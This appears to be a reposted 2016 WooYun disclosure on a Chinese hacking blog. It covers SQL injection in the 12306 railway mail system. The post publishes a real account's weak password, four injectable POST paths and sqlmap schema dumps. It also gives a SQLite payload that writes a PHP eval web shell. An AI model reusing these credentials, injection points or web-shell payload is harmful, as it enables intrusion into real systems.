记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

12306官方邮箱系统深度SQL注入漏洞至少4处

2016-02-02 09:55

下载的tangscan的插件检测到的

a3.jpg



http://mail.12306.cn/app/mail/entry

邮箱弱口令:

zhangyong/123456

0.png



本想看看上传的地方有没有问题,结果只发现了SQL注入

a1.png



a2.png



code 区域
http://mail.12306.cn

post:

/app/simple/mail/Folder/list/Sent/0/20*

/app/simple/mail/Folder/list/Draft/0/20*

/app/simple/mail/Folder/list/Spam/0/20*

/app/simple/mail/Folder/list/Trash/0/20*

这4处应该都是SQL注入点



注入点空格需要替换成%20,不然就404

漏洞证明:

扔sqlmap,结果注入点类型是:SQLite,有点意思

1.png



2.png



5个表的结果如下:

code 区域
mail:

mtbno,mno,fno,new,size,time,dele,attach,mid,reply,mfrom,mto,subject,brief

folder:

fno,folder,sum,count,new,last

searchmail:

session,sno,mtbno,mno,fno,time

sqlite_sequence:

name,seq

search:

session,sno,time,count,name,value



SQLite出数据的方式不太一样,换个姿势--sql-shell

简单读几条数据证明危害

3.png



4.png



5.png



6.png



查了下,SQLite这玩意可以直接写shell,但是需要知道网站路径,不玩了

shell方式:

code 区域
ATTACH DATABASE '$PATH\\shell.php' AS pwn; CREATE TABLE pwn.exp(dataz text); INSERT INTO pwn.exp(dataz)VALUES('<? eval($_GET['cmd']);?>');--

修复方案:

好不容易抢到回家的票!

俺是良民


知识来源: www.wooyun.org/bugs/wooyun-2016-0173220

阅读:111169 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“12306官方邮箱系统深度SQL注入漏洞至少4处”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云